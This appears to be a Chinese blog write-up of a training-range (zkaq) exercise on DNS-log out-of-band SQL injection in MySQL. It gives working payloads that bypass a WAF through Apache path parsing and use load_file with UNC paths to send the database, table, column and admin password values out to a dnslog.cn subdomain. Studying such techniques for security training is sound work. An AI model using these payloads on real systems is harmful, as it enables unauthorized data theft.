SQL注入(Dns注入)---zkaq

已于 2022-04-21 23:31:40 修改
阅读量1.7k 收藏 3
点赞数
分类专栏: WEB安全---zkaq靶场 文章标签: web安全
于 2022-04-11 21:21:04 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_38237216/article/details/124109790
版权

1.概念

1.DNS-log:DNS是解析域名的,log是日志记录,DNS-log是记录域名解析记录日志

2.使用场景:在某些无法直接利用漏洞获得回显的情况下,但是目标可以发起请求,这个时候就可以通过DNS请求把想获得的数据外带出来。

3.涉及的函数:LOAD_FILE():读取文件的函数—读取文件并返回文件内容为字符串

​ a.配置文件中的参数secure_file_priv=

​ b.高版本mysql中会限制

​ c.既然会被限制那有什么用呢?但是也会存在下面几种情况

  • 有的版本会自动开启
  • 有的网站需要这个功能,不得不开启
  • 某些开发、运维顺手开启

4.涉及的其他知识

  • UNC路径:UNC路径就是类似\softer这样的形式的网络路径。
  • 常用的dns_log平台:http://dnslog.cn/

2.靶场

1.尝试SQL注入

payload: and 1=1

发现被WAF拦截

2.尝试其他传参

payload: index.php/1.txt?id=1 and sleep(10)

发现注入的sleep语句生效

这块涉及到apache的解析逻辑漏洞进行染过WAF,在apache中针对不存在的文件进行的传参,会传给前面的文件

3.爆出库名

结合apache的逻辑漏洞利用dns-log平台尝试注入

payload:http://59.63.166.75:8014/index3.php/1.txt?id=1 and load_file(concat(‘//’,database(),‘.8nlop2.dnslog.cn/123’))

4.爆出表名

结合apache的逻辑漏洞利用dns-log平台尝试注入

payload:http://59.63.166.75:8014/index3.php/1.txt?id=1 and load_file(concat(‘//’,(select table_name from information_schema.tables where table_schema=database() limit 0,1),‘.2vm1ag.dnslog.cn/123’))

成功爆出表名

5.爆字段

payload:http://59.63.166.75:8014/index3.php/1.txt?id=1 and load_file(concat(‘//’,(select column_name from information_schema.columns where table_name=‘admin’ limit 1,1),‘.8nlop2.dnslog.cn/123’))

payload:http://59.63.166.75:8014/index3.php/1.txt?id=1 and load_file(concat(‘//’,(select column_name from information_schema.columns where table_name=‘admin’ limit 2,1),‘.0s59x0.dnslog.cn/123’))

6.获取数据

payload: http://59.63.166.75:8014/index3.php/1.txt?id=1 and load_file(concat(‘//’,(select password from mangzhu.admin),‘.0s59x0.dnslog.cn/123’))

拿到flag

real_plot
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqIi-labs,SQL注入平台
08-06
sqIi-labs:是一款学习SQL注入的开源平台,共有75种不同类型的注入 解压密码:ms08067.com sqIi-labs的使用文章见:https://blog.csdn.net/qq_41453285/article/details/100827739
SQL注入天书 sqli-labs
01-11
SQL注入天书 sqli-labs
DNS注入
nobugnomoney的博客
09-11 1315
1.我们首先要知道什么是DNS: 域名解析是把域名指向网站空间IP,让人们通过注册的域名可以方便地访问到网站的一种服务。IP地址是网络上标识站点的数字地址,为了方便记忆,采用域名来代替IP地址标识站点地址。域名解析就是域名到IP地址的转换过程。域名的解析工作由DNS服务器完成。 域名解析也叫域名指向、服务器设置、域名配置以及反向IP登记等等。说得简单点就是将好记的域名解析成IP,服务由DNS服务器完成,是把域名解析到一个IP地址,然后在此IP地址的主机上将一个子目录与域名绑定。 互联网中的地址是数字的IP地
深入探讨DNS数据包注入DNS中毒攻击检测 (C/C++代码实现)
chen1415886044的博客
12-24 1170
DNS数据包注入DNS中毒攻击是网络安全领域中两种重要的攻击方式。DNS数据包注入是一种攻击手段,通过向DNS服务器发送恶意数据包,以篡改其正常功能。而DNS中毒攻击则是一种针对DNS缓存的攻击,目的是通过向DNS服务器的缓存中添加恶意记录,从而使用户访问到错误的网站。
DNSLog注入及SQLmap工具使用
最新发布
2301_80034711的博客
03-18 898
DNSLog就是储存在DNS上的域名相关的信息,它可以记录我们对域名或者IP的访问信息,类似一个日志文件。比如说现在有一个xxx.aaa.com的域名(从右到左分别为顶级域名、二级域名、三级域名),将其域名设置对应的ip1.1.1.1我们向dns服务器发起aaa.com的解析请求时,DNSlog就会记录下对aaa.com的解析,那么解析值就为1.1.1.1,这样被记录下来的过程就是DNSLog。Sqlmap是一个使用python语言开发的开源的渗透测试工具,可以利用SQL注入漏洞,获取数据库服务器的权限。
Dns注入
qq_58000413的博客
09-20 659
DNS-LOG注入 linux能不能用的话[一般不能dnslog注入,除非搭建smb服务]LOAD_FILE(绝对路径) 记得反斜杠。database().hjw.com =>日志就会记录。mysql稍微高一点的版本,默认是不可以读取内容的。load_file 读取文件的函数。DNS-LOG:DNS服务(LOG日志)=>DNS解析日志。文件共享(UNC路径)访问的东西都是把他当做文件处理。dns-log注入:obb(数据外带)Mysql函数:LOAD_FILE()
SQL DNSlog注入详解
永远是少年
08-07 1309
今天继续给大家介绍Linux运维相关知识,本文主要内容是SQL DNSlog注入。 一、SQL DNSlog注入简介 二、SQL DNSlog注入实战
SQL注入DNSLog外带注入
dragon的博客
02-21 2445
什么是dnslog呢?DNS就是域名解析服务,把一个域名转换成对应的IP地址,转换完成之后,DNS服务器就会有一个日志记录本次转换的时间、域名、域名对应的ip、请求方的一些信息,这个日志就叫DNSLog。但是想要查看DNSLog信息的人,必须是拥有DNS服务器权限的人,这就使的我们要是用dnslog注入方法的话,就需要搭建自己的一个dns服务器,成本相对较高。所以在此就推荐两个平台,可以快速让我们使用dnslog外带注入也可以使用BurpSuite同样可以实现相应功能。
安全测试-常见sql注入方法,命令
03-31
安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入...
超级SQL注入工具-web-sql
10-28
超级SQL注入工具是一款基于HTTP协议自组包的SQL注入工具,支持出现在HTTP协议任意位置的SQL注入,支持各种类型的SQL注入 支持Bool型盲注、错误显示注入、Union注入,支持Access、MySQL5以上版本、SQLServer、Oracle...
SQL手工注入完全篇
09-08
SQL手工注入完全篇
写bat脚本双击执行
qq_35911118的博客
04-08 2642
@echo off           不显示后续命令行及当前命令行 dir c:*.* >a.txt       将c盘文件列表写入a.txt call c:\ucdos\ucdos.bat    调用ucdos echo 你好            显示"你好" pause              暂停,等待按键继续 rem 准备运行wps         注释:准备运行wps cd ucdos            进入ucdos目录 wps               运行wps @echo
dns缓存
qq_35543858的博客
01-25 733
查看dns缓存 ipconfig/displaydns 清除dns缓存 ipconfig/flushdns DNS缓存介绍 记录种类 A记录是指定域名对应的IP地址。 AAAA记录一个域名对应的IPv6地址 NS记录 是指定由哪个DNS服务器解析你的域名。 MX记录 是指邮件交换记录,记录了在当前网络下,存在的mail服务器 CNAME记录 是指别名记录,允许多个域名对应一个ip ...
【sqlmap渗透进阶】DNS-domain注入
记录学习,一起进步
03-18 945
【sqlmap渗透进阶】DNS-domain注入
sql注入】sqlmap+DNSlog外带数据 注入复现
C_LCH_2000的博客
08-19 1951
DNSlog注入 dnslog注入原理通过子查询,将内容拼接到域名内,查询相应的dns解析记录,来获取我们想要的数据 利用场景 在sql注入为布尔盲注、时间盲注时,如果遇到大量的数据,注入的效率将十分低下且耗时,用sqlmap还容易被waf拦截,IP被ban,这种情况就可用利用内置文件读取函数 load_file()来完成 DNSlog注入
SQL注入DnsLog注入
qq_52310755的博客
03-22 1911
远程访问UNC路径中主机的地址,如果是域名将会进行解析并留下记录,通过查看DNS解析记录(DNS日志)来达到有回显的目的。DnsLog注入就是利用load_file()函数访问远程文件的特点,对延时盲注等无回显的注入或其他无回显的攻击带来回显。正常来讲每个查询记录都会在相应DNS服务器上留下相关的查询日志,一般来说企业或者自己部署的DNS在上图标红位置处,Ps:如果paylaod没有问题但一直刷新不出来可能是谷歌浏览器的问题,换个浏览器访问一下就可以了。,下面以盲注为例,需要有盲注的基础。
DNS外带注入
weixin_52501704的博客
10-09 1435
DNS外带注入
SQL注入dns回显注入
qq_41679358的博客
08-03 2041
DNSlog外带数据注入 用到的网站 http://dnsbin.zhack.ca/ http://dnslog.cn/ http://ceye.io/ pyload: 查库 http://192.168.232.128/sqllabs/Less-8/?id=1' and load_file(concat("\\\\",database(),".kkc53r.dnslog.cn\\xxx.txt")) --+ 查表 http://192.168.232.128/sqllabs/Less-8/?id=1'
sql注入sql-labs
09-12
如果你需要修改sqli-labs的数据库连接信息,你可以找到sqli-labs-master文件夹里的sql-connections文件夹下的db-creds.inc文件,并用记事本打开。在文件中,你可以修改用户名和密码。数据库密码可以在phpstudy的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值